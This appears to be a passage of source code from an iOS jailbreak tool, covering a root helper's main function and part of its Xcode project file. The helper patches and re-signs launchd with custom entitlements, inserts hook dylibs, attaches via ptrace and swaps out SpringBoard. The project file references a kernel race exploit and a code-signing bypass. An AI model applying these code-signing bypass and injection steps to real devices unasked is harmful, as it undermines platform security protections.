posix_spawn(&task_pid, [ldidPath fileSystemRepresentation], &action, NULL, (char* const*)argsC, NULL); for (NSUInteger i = 0; i < argCount; i++) { free(argsC[i]); } free(argsC); if(spawnError != 0) { NSLog(@"posix_spawn error %d\n", spawnError); return spawnError; } do { if (waitpid(task_pid, &status, 0) != -1) { //printf("Child status %dn", WEXITSTATUS(status)); } else { perror("waitpid"); return -222; } } while (!WIFEXITED(status) && !WIFSIGNALED(status)); close(outErr[1]); close(out[1]); NSString* ldidOutput = getNSStringFromFile(out[0]); if(output) { *output = ldidOutput; } NSString* ldidErrorOutput = getNSStringFromFile(outErr[0]); if(errorOutput) { *errorOutput = ldidErrorOutput; } return WEXITSTATUS(status); } int signAdhoc(NSString *filePath, NSString *entitlements) // lets just assume ldid is included ok { // if(!isLdidInstalled()) return 173; // NSString *entitlementsPath = nil; NSString *signArg = @"-S"; NSString* errorOutput; if(entitlements) { // NSData *entitlementsXML = [NSPropertyListSerialization dataWithPropertyList:entitlements format:NSPropertyListXMLFormat_v1_0 options:0 error:nil]; // if (entitlementsXML) { // entitlementsPath = [[NSTemporaryDirectory() stringByAppendingPathComponent:[NSUUID UUID].UUIDString] stringByAppendingPathExtension:@"plist"]; // [entitlementsXML writeToFile:entitlementsPath atomically:NO]; signArg = [signArg stringByAppendingString:entitlements]; // signArg = [signArg stringByAppendingString:@" -Cadhoc"]; // signArg = [signArg stringByAppendingString:@" -M"]; // signArg = [signArg stringByAppendingString:@"/sbin/launchd"]; // } } NSLog(@"roothelper: running ldid"); int ldidRet = runLdid(@[signArg, filePath], nil, &errorOutput); // if (entitlementsPath) { // [[NSFileManager defaultManager] removeItemAtPath:entitlementsPath error:nil]; // } NSLog(@"roothelper: ldid exited with status %d", ldidRet); NSLog(@"roothelper: - ldid error output start -"); printMultilineNSString(signArg); printMultilineNSString(errorOutput); NSLog(@"roothelper: - ldid error output end -"); if(ldidRet == 0) { return 0; } else { return 175; } //} } NSSet* immutableAppBundleIdentifiers(void) { NSMutableSet* systemAppIdentifiers = [NSMutableSet new]; LSEnumerator* enumerator = [LSEnumerator enumeratorForApplicationProxiesWithOptions:0]; LSApplicationProxy* appProxy; while(appProxy = [enumerator nextObject]) { if(appProxy.installed) { if(![appProxy.bundleURL.path hasPrefix:@"/private/var/containers"]) { [systemAppIdentifiers addObject:appProxy.bundleIdentifier.lowercaseString]; } } } return systemAppIdentifiers.copy; } void replaceByte(NSString *filePath, int offset, const char *replacement) { const char *fileCString = [filePath UTF8String]; FILE *file = fopen(fileCString, "r+"); if (file == NULL) { NSLog(@"Error opening workinglaunchd"); perror("Error opening file"); return; } fseek(file, offset, SEEK_SET); fwrite(replacement, sizeof(char), 4, file); fclose(file); } int main(int argc, char *argv[], char *envp[]) { @autoreleasepool { // NSLog(@"Hello from the other side! our uid is %u and our pid is %d", getuid(), getpid()); loadMCMFramework(); NSString* action = [NSString stringWithUTF8String:argv[1]]; NSString* source = [NSString stringWithUTF8String:argv[2]]; NSString* destination = [NSString stringWithUTF8String:argv[3]]; if ([action isEqual: @"writedata"]) { [source writeToFile:destination atomically:YES encoding:NSUTF8StringEncoding error:nil]; } else if ([action isEqual: @"filemove"]) { [[NSFileManager defaultManager] moveItemAtPath:source toPath:destination error:nil]; } else if ([action isEqual: @"filecopy"]) { NSLog(@"roothelper: cp"); [[NSFileManager defaultManager] copyItemAtPath:source toPath:destination error:nil]; } else if ([action isEqual: @"makedirectory"]) { NSLog(@"roothelper: mkdir"); [[NSFileManager defaultManager] createDirectoryAtPath:source withIntermediateDirectories:true attributes:nil error:nil]; } else if ([action isEqual: @"removeitem"]) { NSLog(@"roothelper: rm"); [[NSFileManager defaultManager] removeItemAtPath:source error:nil]; } else if ([action isEqual: @"permissionset"]) { NSLog(@"roothelper chmod %@", source); // just pass in 755 NSMutableDictionary *dict = [[NSMutableDictionary alloc] init]; [dict setObject:[NSNumber numberWithInt:755] forKey:NSFilePosixPermissions]; [[NSFileManager defaultManager] setAttributes:dict ofItemAtPath:source error:nil]; // } else if ([action isEqual: @"rebuildiconcache"]) { // cleanRestrictions(); // [[LSApplicationWorkspace defaultWorkspace] _LSPrivateRebuildApplicationDatabasesForSystemApps:YES internal:YES user:YES]; // refreshAppRegistrations(); // killall(@"backboardd"); } else if ([action isEqual: @"codesign"]) { NSLog(@"roothelper: adhoc sign + fastsign"); // NSDictionary* entitlements = @{ // @"get-task-allow": [NSNumber numberWithBool:YES], // @"platform-application": [NSNumber numberWithBool:YES], // }; NSString* launchdents = [usprebooterappPath() stringByAppendingPathComponent:@"launchdentitlements.plist"]; NSString* patchedLaunchdCopy = [usprebooterappPath() stringByAppendingPathComponent:@"workinglaunchd"]; signAdhoc(patchedLaunchdCopy, launchdents); // source file, NSDictionary with entitlements // TODO: Use ct_bypass instead of fastPathSign, it's just better :trol: NSString *fastPathSignPath = [usprebooterappPath() stringByAppendingPathComponent:@"fastPathSign"]; NSString *stdOut; NSString *stdErr; spawnRoot(fastPathSignPath, @[@"-i", patchedLaunchdCopy, @"-r", @"-o", patchedLaunchdCopy], &stdOut, &stdErr); } else if ([action isEqual: @"ptrace"]) { NSLog(@"roothelper: stage 1 ptrace"); NSString *stdOut; NSString *stdErr; NSLog(@"trolltoolshelper path %@", rootHelperPath()); spawnRoot(rootHelperPath(), @[@"ptrace2", source, @""], &stdOut, &stdErr); kill(getpid(), 1); } else if ([action isEqual: @"ptrace2"]) { NSLog(@"roothelper: stage 2 ptrace, app pid: %@", source); int pidInt = [source intValue]; // source = pid of app. // ptrace the source, the pid of the original app // then detach immediately // ptrace(PT_TRACE_ME,0,0,0); ptrace(PT_ATTACH, pidInt, 0, 0); ptrace(PT_DETACH, pidInt, 0, 0); NSLog(@"Done ptracing!"); } else if ([action isEqual: @"bootstrap"]) { NSLog(@"installing"); if (!jbroot(@"/")) { NSLog(@"jbroot not found..."); } else { // if (!jbroot(@"lunchd")) { // 1. install roothide bootstrap // 2. copy over launchd to your macos from your phone NSLog(@"copy launchd over"); [[NSFileManager defaultManager] copyItemAtPath:@"/sbin/launchd" toPath:[usprebooterappPath() stringByAppendingPathComponent:@"workinglaunchd"] error:nil]; // remove cpu subtype, insert_dylib, then replaceByte([usprebooterappPath() stringByAppendingPathComponent:@"workinglaunchd"], 8, "\x00\x00\x00\x00"); insert_dylib_main("@loader_path/launchdhook.dylib", [[usprebooterappPath() stringByAppendingPathComponent:@"workinglaunchd"] UTF8String]); sleep(1); NSLog(@"sign launchd over and out"); spawnRoot(rootHelperPath(), @[@"codesign", source, @""], nil, nil); // 3. copy over workinglaunchd to your jbroot/lunchd [[NSFileManager defaultManager] copyItemAtPath:[usprebooterappPath() stringByAppendingPathComponent:@"workinglaunchd"] toPath:jbroot(@"lunchd") error:nil]; // 4. copy over launchdhooksigned.dylib as jbroot/launchdhook.dylib [[NSFileManager defaultManager] copyItemAtPath:[usprebooterappPath() stringByAppendingPathComponent:@"launchdhooksigned.dylib"] toPath:jbroot(@"launchdhook.dylib") error:nil]; // 5. copy over your regular SpringBoard.app to jbroot/System/Library/CoreServices/SpringBoard.app [[NSFileManager defaultManager] createDirectoryAtPath: jbroot(@"/System/Library/CoreServices/") withIntermediateDirectories:YES attributes:nil error:nil]; [[NSFileManager defaultManager] copyItemAtPath:@"/System/Library/CoreServices/SpringBoard.app" toPath:jbroot(@"/System/Library/CoreServices/SpringBoard.app") error:nil]; // 6. replace the regular SpringBoard in your jbroot/System/Library/CoreServices/SpringBoard.app/SpringBoard with springboardshimsignedinjected [[NSFileManager defaultManager] removeItemAtPath:jbroot(@"/System/Library/CoreServices/SpringBoard.app/SpringBoard") error:nil]; [[NSFileManager defaultManager] copyItemAtPath:[usprebooterappPath() stringByAppendingPathComponent:@"springboardshimsignedinjected"] toPath:jbroot(@"/System/Library/CoreServices/SpringBoard.app/SpringBoard") error:nil]; // 7. place springboardhooksigned.dylib as jbroot/SpringBoard.app/springboardhook.dylib [[NSFileManager defaultManager] removeItemAtPath:jbroot(@"/System/Library/CoreServices/SpringBoard.app/springboardhook.dylib") error:nil]; [[NSFileManager defaultManager] copyItemAtPath:[usprebooterappPath() stringByAppendingPathComponent:@"springboardhooksigned.dylib"] toPath:[jbroot(@"/System/Library/CoreServices/SpringBoard.app") stringByAppendingPathComponent:@"springboardhook.dylib"] error:nil]; // last step: create a symlink to jbroot named .jbroot [[NSFileManager defaultManager] createSymbolicLinkAtPath:jbroot(@"/System/Library/CoreServices/SpringBoard.app/.jbroot") withDestinationPath:jbroot(@"/") error:nil]; // } else { // NSLog(@"lunchd was found, you've already installed"); // } } } return 0; } } ================================================ FILE: Serotonin.xcodeproj/project.pbxproj ================================================ // !$*UTF8*$! { archiveVersion = 1; classes = { }; objectVersion = 56; objects = { /* Begin PBXBuildFile section */ 013141FF2B445B26006BEBE9 /* memoryControl.m in Sources */ = {isa = PBXBuildFile; fileRef = 013141FE2B445B26006BEBE9 /* memoryControl.m */; }; C805CA452B1719C1005157BA /* util.m in Sources */ = {isa = PBXBuildFile; fileRef = C805CA442B1719C1005157BA /* util.m */; }; C81122DF2B16C9CC00AD077B /* troller.m in Sources */ = {isa = PBXBuildFile; fileRef = C81122DE2B16C9CC00AD077B /* troller.m */; }; C82AFEF42B175AB80070EA49 /* Assets.xcassets in Resources */ = {isa = PBXBuildFile; fileRef = C82AFEF32B175AB80070EA49 /* Assets.xcassets */; }; C82AFF392B17688E0070EA49 /* usprebooterApp.swift in Sources */ = {isa = PBXBuildFile; fileRef = C82AFEF12B175AA30070EA49 /* usprebooterApp.swift */; }; C82AFF3A2B1768990070EA49 /* ContentView.swift in Sources */ = {isa = PBXBuildFile; fileRef = C82AFEEF2B175A270070EA49 /* ContentView.swift */; }; C82AFF3F2B179A8C0070EA49 /* IOKit.framework in Frameworks */ = {isa = PBXBuildFile; fileRef = C82AFF3D2B179A880070EA49 /* IOKit.framework */; }; C82AFF432B17AA6D0070EA49 /* ldid in Resources */ = {isa = PBXBuildFile; fileRef = C82AFF422B17AA6C0070EA49 /* ldid */; }; C83594CF2B18F70700346F80 /* overwriter.m in Sources */ = {isa = PBXBuildFile; fileRef = C83594CE2B18F70700346F80 /* overwriter.m */; }; C83594D22B18F74600346F80 /* vm_unaligned_copy_switch_race.c in Sources */ = {isa = PBXBuildFile; fileRef = C83594D12B18F74600346F80 /* vm_unaligned_copy_switch_race.c */; }; C84002E92B4A55A300C73950 /* springboardshimsignedinjected in Resources */ = {isa = PBXBuildFile; fileRef = C84002E82B4A55A300C73950 /* springboardshimsignedinjected */; }; C84002ED2B4A64E200C73950 /* launchdentitlements.plist in Resources */ = {isa = PBXBuildFile; fileRef = C84002EC2B4A64E200C73950 /* launchdentitlements.plist */; }; C8BFCCA42B3FFE570008D8FD /* fun.m in Sources */ = {isa = PBXBuildFile; fileRef = C8BFCC7F2B3FFE560008D8FD /* fun.m */; }; C8BFCCA62B3FFE570008D8FD /* dir.m in Sources */ = {isa = PBXBuildFile; fileRef = C8BFCC822B3FFE560008D8FD /* dir.m */; }; C8BFCCA82B3FFE570008D8FD /* utils.m in Sources */ = {isa = PBXBuildFile; fileRef = C8BFCC842B3FFE560008D8FD /* utils.m */; }; C8BFCCA92B3FFE570008D8FD /* thanks_opa334dev_htrowii.m in Sources */ = {isa = PBXBuildFile; fileRef = C8BFCC852B3FFE560008D8FD /* thanks_opa334dev_htrowii.m */; }; C8BFCCAA2B3FFE570008D8FD /* cs_blobs.m in Sources */ = {isa = PBXBuildFile; fileRef = C8BFCC862B3FFE560008D8FD /* cs_blobs.m */; }; C8BFCCAB2B3FFE570008D8FD /* krw.c in Sources */ = {isa = PBXBuildFile; fileRef = C8BFCC872B3FFE560008D8FD /* krw.c */; }; C8BFCCAC2B3FFE570008D8FD /* offsets.m in Sources */ = {isa = PBXBuildFile; fileRef = C8BFCC882B3FFE560008D8FD /* offsets.m */; }; C8BFCCAD2B3FFE570008D8FD /* vnode.m in Sources */ = {isa = PBXBuildFile; fileRef = C8BFCC892B3FFE560008D8FD /* vnode.m */; }; C8BFCCAE2B3FFE570008D8FD /* proc.c in Sources */ = {isa = PBXBuildFile; fileRef = C8BFCC8A2B3FFE560008D8FD /* proc.c */; }; C8BFCCB42B427C0F0008D8FD /* Log.swift in Sources */ = {isa = PBXBuildFile; fileRef = C8BFCCB32B427C0F0008D8FD /* Log.swift */; }; D6E08F1E2B48B04E00AE49BF /* TheCoolerContentView.swift in Sources */ = {isa = PBXBuildFile; fileRef = D6E08F1D2B48B04E00AE49BF /* TheCoolerContentView.swift */; }; D6E08F4A2B48E24F00AE49BF /* UTTagClass.swift in Sources */ = {isa = PBXBuildFile; fileRef = D6E08F2E2B48E24E00AE49BF /* UTTagClass.swift */; }; D6E08F4B2B48E24F00AE49BF /* CoreTypes.swift in Sources */ = {isa = PBXBuildFile; fileRef = D6E08F2F2B48E24E00AE49BF /* CoreTypes.swift */; }; D6E08F4C2B48E24F00AE49BF /* UTType.swift in Sources */ = {isa = PBXBuildFile; fileRef = D6E08F302B48E24E00AE49BF /* UTType.swift */; }; D6E08F4D2B48E24F00AE49BF /* URLSession+Async.swift in Sources */ = {isa = PBXBuildFile; fileRef = D6E08F322B48E24E00AE49BF /* URLSession+Async.swift */; }; D6E08F4E2B48E24F00AE49BF /* Never+Representation.swift in Sources */ = {isa = PBXBuildFile; fileRef = D6E08F352B48E24E00AE49BF /* Never+Representation.swift */; }; D6E08F4F2B48E24F00AE49BF /* Tuple+Representation.swift in Sources */ = {isa = PBXBuildFile; fileRef = D6E08F362B48E24F00AE49BF /* Tuple+Representation.swift */; }; D6E08F502B48E24F00AE49BF /* Codable+Representation.swift in Sources */ = {isa = PBXBuildFile; fileRef = D6E08F372B48E24F00AE49BF /* Codable+Representation.swift */; }; D6E08F512B48E24F00AE49BF /* Data+Representation.swift in Sources */ = {isa = PBXBuildFile; fileRef = D6E08F382B48E24F00AE49BF /* Data+Representation.swift */; }; D6E08F522B48E24F00AE49BF /* _ConditionalRepresentation.swift in Sources */ = {isa = PBXBuildFile; fileRef = D6E08F392B48E24F00AE49BF /* _ConditionalRepresentation.swift */; }; D6E08F532B48E24F00AE49BF /* File+Representations.swift in Sources */ = {isa = PBXBuildFile; fileRef = D6E08F3A2B48E24F00AE49BF /* File+Representations.swift */; }; D6E08F542B48E24F00AE49BF /* Data+Transferable.swift in Sources */ = {isa = PBXBuildFile; fileRef = D6E08F3C2B48E24F00AE49BF /* Data+Transferable.swift */; }; D6E08F552B48E24F00AE49BF /* URL+Transferable.swift in Sources */ = {isa = PBXBuildFile; fileRef = D6E08F3D2B48E24F00AE49BF /* URL+Transferable.swift */; }; D6E08F562B48E24F00AE49BF /* String+Transferable.swift in Sources */ = {isa = PBXBuildFile; fileRef = D6E08F3E2B48E24F00AE49BF /* String+Transferable.swift */; }; D6E08F572B48E24F00AE49BF /* Never+Transferable.swift in Sources */ = {isa = PBXBuildFile; fileRef = D6E08F3F2B48E24F00AE49BF /* Never+Transferable.swift */; }; D6E08F582B48E24F00AE49BF /* AttributedString+Transferable.swift in Sources */ = {isa = PBXBuildFile; fileRef = D6E08F402B48E24F00AE49BF /* AttributedString+Transferable.swift */; }; D6E08F592B48E24F00AE49BF /* Visibility.swift in Sources */ = {isa = PBXBuildFile; fileRef = D6E08F422B48E24F00AE49BF /* Visibility.swift */; }; D6E08F5A2B48E24F00AE49BF /* SentTransferredFile.swift in Sources */ = {isa = PBXBuildFile; fileRef = D6E08F432B48E24F00AE49BF /* SentTransferredFile.swift */; }; D6E08F5B2B48E24F00AE49BF /* ReceivedTransferredFile.swift in Sources */ = {isa = PBXBuildFile; fileRef = D6E08F442B48E24F00AE49BF /* ReceivedTransferredFile.swift */; }; D6E08F5C2B48E24F00AE49BF /* NSItemProvider+Transferable.swift in Sources */ = {isa = PBXBuildFile; fileRef = D6E08F452B48E24F00AE49BF /* NSItemProvider+Transferable.swift */; }; D6E08F5D2B48E24F00AE49BF /* Transferable.swift in Sources */ = {isa = PBXBuildFile; fileRef = D6E08F462B48E24F00AE49BF /* Transferable.swift */; }; D6E08F5E2B48E24F00AE49BF /* TransferRepresentationBuilder.swift in Sources */ = {isa = PBXBuildFile; fileRef = D6E08F472B48E24F00AE49BF /* TransferRepresentationBuilder.swift */; }; D6E08F5F2B48E24F00AE49BF /* TransferableRepresentation.swift in Sources */ = {isa = PBXBuildFile; fileRef = D6E08F482B48E24F00AE49BF /* TransferableRepresentation.swift */; }; D6E08F602B48E24F00AE49BF /* Backport.swift in Sources */ = {isa = PBXBuildFile; fileRef = D6E08F492B48E24F00AE49BF /* Backport.swift */; }; D6E0900D2B48E26000AE49BF /* Platforms.swift in Sources */ = {isa = PBXBuildFile; fileRef = D6E08F632B48E25E00AE49BF /* Platforms.swift */; }; D6E0900E2B48E26000AE49BF /* SafeArea.swift in Sources */ = {isa = PBXBuildFile; fileRef = D6E08F642B48E25E00AE49BF /* SafeArea.swift */; }; D6E0900F2B48E26000AE49BF /* Environment.swift in Sources */ = {isa = PBXBuildFile; fileRef = D6E08F652B48E25E00AE49BF /* Environment.swift */; }; D6E090102B48E26000AE49BF /* Environment+String.swift in Sources */ = {isa = PBXBuildFile; fileRef = D6E08F662B48E25E00AE49BF /* Environment+String.swift */; }; D6E090112B48E26000AE49BF /* OwningController.swift in Sources */ = {isa = PBXBuildFile; fileRef = D6E08F672B48E25E00AE49BF /* OwningController.swift */; }; D6E090122B48E26000AE49BF /* NSItemProvider+Async.swift in Sources */ = {isa = PBXBuildFile; fileRef = D6E08F682B48E25E00AE49BF /* NSItemProvider+Async.swift */; }; D6E090132B48E26000AE49BF /* UIScene.swift in Sources */ = {isa = PBXBuildFile; fileRef = D6E08F692B48E25E00AE49BF /* UIScene.swift */; }; D6E090142B48E26000AE49BF /* Inspect.swift in Sources */ = {isa = PBXBuildFile; fileRef = D6E08F6A2B48E25E00AE49BF /* Inspect.swift */; }; D6E090152B48E26000AE49BF /* String+LocalizationKey.swift in Sources */ = {isa = PBXBuildFile; fileRef = D6E08F6B2B48E25E00AE49BF /* String+LocalizationKey.swift */; }; D6E090162B48E26000AE49BF /* VisualEffect+iOS.swift in Sources */ = {isa = PBXBuildFile; fileRef = D6E08F6D2B48E25F00AE49BF /* VisualEffect+iOS.swift */; }; D6E090172B48E26000AE49BF /* VisualEffect+macOS.swift in Sources */ = {isa = PBXBuildFile; fileRef = D6E08F6E2B48E25F00AE49BF /* VisualEffect+macOS.swift */; }; D6E0907C2B48E26000AE49BF /* Detents.swift in Sources */ = {isa = PBXBuildFile; fileRef = D6E090022B48E25F00AE49BF /* Detents.swift */; }; D6E090852B48E26000AE49BF /* UIBackport.swift in Sources */ = {isa = PBXBuildFile; fileRef = D6E0900C2B48E25F00AE49BF /* UIBackport.swift */; }; D6E0908C2B48E3A200AE49BF /* BlobLayer.swift in Sources */ = {isa = PBXBuildFile; fileRef = D6E090872B48E3A200AE49BF /* BlobLayer.swift */; }; D6E0908D2B48E3A200AE49BF /* ResizableLayer.swift in Sources */ = {isa = PBXBuildFile; fileRef = D6E090882B48E3A200AE49BF /* ResizableLayer.swift */; }; D6E0908E2B48E3A200AE49BF /* FluidGradientView.swift in Sources */ = {isa = PBXBuildFile; fileRef = D6E090892B48E3A200AE49BF /* FluidGradientView.swift */; }; D6E0908F2B48E3A200AE49BF /* CGPoint+Extensions.swift in Sources */ = {isa = PBXBuildFile; fileRef = D6E0908A2B48E3A200AE49BF /* CGPoint+Extensions.swift */; }; D6E090902B48E3A200AE49BF /* FluidGradient.swift in Sources */ = {isa = PBXBuildFile; fileRef = D6E0908B2B48E3A200AE49BF /* FluidGradient.swift */; }; D6F9CF3F2B4B2F7D00274803 /* ct_bypass in Resources */ = {isa = PBXBuildFile; fileRef = D6F9CF3E2B4B2F7D00274803 /* ct_bypass */; }; D6F9CF412B4B306400274803 /* fastPathSign in Resources */ = {isa = PBXBuildFile; fileRef = D6F9CF402B4B306400274803 /* fastPathSign */; }; /* End PBXBuildFile section */ /* Begin PBXFileReference section */ 013141FE2B445B26006BEBE9 /* memoryControl.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = memoryControl.m; sourceTree = ""; }; 013142012B445B48006BEBE9 /* memoryControl.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = memoryControl.h; sourceTree = ""; }; C805CA442B1719C1005157BA /* util.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = util.m; sourceTree = ""; }; C805CA462B1719D5005157BA /* util.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = util.h; sourceTree = ""; }; C811229A2B15E7BB00AD077B /* usprebooter.app */ = {isa = PBXFileReference; explicitFileType = wrapper.application; includeInIndex = 0; path = usprebooter.app; sourceTree = BUILT_PRODUCTS_DIR; }; C81122AB2B15E7BD00AD077B /* Info.plist */ = {isa = PBXFileReference; lastKnownFileType = text.plist.xml; path = Info.plist; sourceTree = ""; }; C81122CF2B15EA8600AD077B /* usprebooter-Bridging-Header.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = "usprebooter-Bridging-Header.h"; sourceTree = ""; }; C81122DD2B16C9CB00AD077B /* troller.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = troller.h; sourceTree = ""; }; C81122DE2B16C9CC00AD077B /* troller.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = troller.m; sourceTree = ""; }; C82AFEEF2B175A270070EA49 /* ContentView.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = ContentView.swift; sourceTree = ""; }; C82AFEF12B175AA30070EA49 /* usprebooterApp.swift */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.swift; path = usprebooterApp.swift; sourceTree = ""; }; C82AFEF32B175AB80070EA49 /* Assets.xcassets */ = {isa = PBXFileReference; lastKnownFileType = folder.assetcatalog; path = Assets.xcassets; sourceTree = ""; }; C82AFF0D2B1762CE0070EA49 /* fakeroot */ = {isa = PBXFileReference; lastKnownFileType = text; path = fakeroot; sourceTree = ""; }; C82AFF102B1762CE0070EA49 /* trolltoolsroothelper */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.executable"; path = trolltoolsroothelper; sourceTree = ""; }; C82AFF112B1762CE0070EA49 /* .stamp */ = {isa = PBXFileReference; lastKnownFileType = text; path = .stamp; sourceTree = ""; }; C82AFF132B1762CE0070EA49 /* uicache.m.df2b699c.Td */ = {isa = PBXFileReference; lastKnownFileType = text; path = uicache.m.df2b699c.Td; sourceTree = ""; }; C82AFF142B1762CE0070EA49 /* main.m.cb550517.Td */ = {isa = PBXFileReference; lastKnownFileType = text; path = main.m.cb550517.Td; sourceTree = ""; }; C82AFF152B1762CE0070EA49 /* uicache.m.1773e4a4.Td */ = {isa = PBXFileReference; lastKnownFileType = text; path = uicache.m.1773e4a4.Td; sourceTree = ""; }; C82AFF162B1762CE0070EA49 /* main.m.1773e4a4.o */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.objfile"; path = main.m.1773e4a4.o; sourceTree = ""; }; C82AFF172B1762CE0070EA49 /* uicache.m.1773e4a4.o */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.objfile"; path = uicache.m.1773e4a4.o; sourceTree = ""; }; C82AFF182B1762CE0070EA49 /* TSUtil.m.1773e4a4.Td */ = {isa = PBXFileReference; lastKnownFileType = text; path = TSUtil.m.1773e4a4.Td; sourceTree = ""; }; C82AFF192B1762CE0070EA49 /* main.m.df2b699c.o */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.objfile"; path = main.m.df2b699c.o; sourceTree = ""; }; C82AFF1A2B1762CE0070EA49 /* TSUtil.m.cb550517.o */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.objfile"; path = TSUtil.m.cb550517.o; sourceTree = ""; }; C82AFF1B2B1762CE0070EA49 /* trolltoolsroothelper.dSYM */ = {isa = PBXFileReference; lastKnownFileType = wrapper.dsym; path = trolltoolsroothelper.dSYM; sourceTree = ""; }; C82AFF1C2B1762CE0070EA49 /* TSUtil.m.df2b699c.Td */ = {isa = PBXFileReference; lastKnownFileType = text; path = TSUtil.m.df2b699c.Td; sourceTree = ""; }; C82AFF1D2B1762CE0070EA49 /* uicache.m.df2b699c.o */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.objfile"; path = uicache.m.df2b699c.o; sourceTree = ""; }; C82AFF1E2B1762CE0070EA49 /* TSUtil.m.cb550517.Td */ = {isa = PBXFileReference; lastKnownFileType = text; path = TSUtil.m.cb550517.Td; sourceTree = ""; }; C82AFF1F2B1762CE0070EA49 /* TSUtil.m.1773e4a4.o */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.objfile"; path = TSUtil.m.1773e4a4.o; sourceTree = ""; }; C82AFF202B1762CE0070EA49 /* main.m.df2b699c.Td */ = {isa = PBXFileReference; lastKnownFileType = text; path = main.m.df2b699c.Td; sourceTree = ""; }; C82AFF212B1762CE0070EA49 /* main.m.1773e4a4.Td */ = {isa = PBXFileReference; lastKnownFileType = text; path = main.m.1773e4a4.Td; sourceTree = ""; }; C82AFF222B1762CE0070EA49 /* uicache.m.cb550517.o */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.objfile"; path = uicache.m.cb550517.o; sourceTree = ""; }; C82AFF232B1762CE0070EA49 /* uicache.m.cb550517.Td */ = {isa = PBXFileReference; lastKnownFileType = text; path = uicache.m.cb550517.Td; sourceTree = ""; }; C82AFF242B1762CE0070EA49 /* TSUtil.m.df2b699c.o */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.objfile"; path = TSUtil.m.df2b699c.o; sourceTree = ""; }; C82AFF252B1762CE0070EA49 /* main.m.cb550517.o */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.objfile"; path = main.m.cb550517.o; sourceTree = ""; }; C82AFF292B1762CE0070EA49 /* net.sourceloc.trolltoolsroothelper-1.0 */ = {isa = PBXFileReference; lastKnownFileType = text; path = "net.sourceloc.trolltoolsroothelper-1.0"; sourceTree = ""; }; C82AFF2A2B1762CE0070EA49 /* build_session */ = {isa = PBXFileReference; lastKnownFileType = text; path = build_session; sourceTree = ""; }; C82AFF2B2B1762CE0070EA49 /* Makefile */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.make; path = Makefile; sourceTree = ""; }; C82AFF2C2B1762CE0070EA49 /* entitlements.plist */ = {isa = PBXFileReference; lastKnownFileType = text.plist; path = entitlements.plist; sourceTree = ""; }; C82AFF2D2B1762CE0070EA49 /* TSUtil.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = TSUtil.m; sourceTree = ""; }; C82AFF2E2B1762CE0070EA49 /* RootHelperSample.xcodeproj */ = {isa = PBXFileReference; lastKnownFileType = "wrapper.pb-project"; path = RootHelperSample.xcodeproj; sourceTree = ""; }; C82AFF312B1762CE0070EA49 /* main.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = main.m; sourceTree = ""; }; C82AFF332B1762CE0070EA49 /* TSUtil.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = TSUtil.h; sourceTree = ""; }; C82AFF342B1762CE0070EA49 /* CoreServices.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = CoreServices.h; sourceTree = ""; }; C82AFF352B1762CE0070EA49 /* RemoteLog.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = RemoteLog.h; sourceTree = ""; }; C82AFF362B1762CE0070EA49 /* control */ = {isa = PBXFileReference; lastKnownFileType = text; path = control; sourceTree = ""; }; C82AFF3C2B1796D90070EA49 /* IOKit.tbd */ = {isa = PBXFileReference; lastKnownFileType = "sourcecode.text-based-dylib-definition"; name = IOKit.tbd; path = ../theos/sdks/iPhoneOS15.5.sdk/System/Library/Frameworks/IOKit.framework/Versions/Current/IOKit.tbd; sourceTree = ""; }; C82AFF3D2B179A880070EA49 /* IOKit.framework */ = {isa = PBXFileReference; lastKnownFileType = wrapper.framework; name = IOKit.framework; path = System/Library/Frameworks/IOKit.framework; sourceTree = SDKROOT; }; C82AFF422B17AA6C0070EA49 /* ldid */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.executable"; path = ldid; sourceTree = ""; }; C83594C32B17AC8500346F80 /* MobileContainerManager.framework */ = {isa = PBXFileReference; lastKnownFileType = wrapper.framework; name = MobileContainerManager.framework; path = ../theos/sdks/iPhoneOS15.5.sdk/System/Library/PrivateFrameworks/MobileContainerManager.framework; sourceTree = ""; }; C83594CE2B18F70700346F80 /* overwriter.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = overwriter.m; sourceTree = ""; }; C83594D02B18F74600346F80 /* vm_unaligned_copy_switch_race.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = vm_unaligned_copy_switch_race.h; sourceTree = ""; }; C83594D12B18F74600346F80 /* vm_unaligned_copy_switch_race.c */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.c; path = vm_unaligned_copy_switch_race.c; sourceTree = ""; }; C83594D32B18F80300346F80 /* overwriter.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = overwriter.h; sourceTree = ""; }; C84002E32B4A545400C73950 /* insert_dylib.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = insert_dylib.m; sourceTree = ""; }; C84002E52B4A547B00C73950 /* insert_dylib.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = insert_dylib.h; sourceTree = ""; }; C84002E82B4A55A300C73950 /* springboardshimsignedinjected */ = {isa = PBXFileReference; 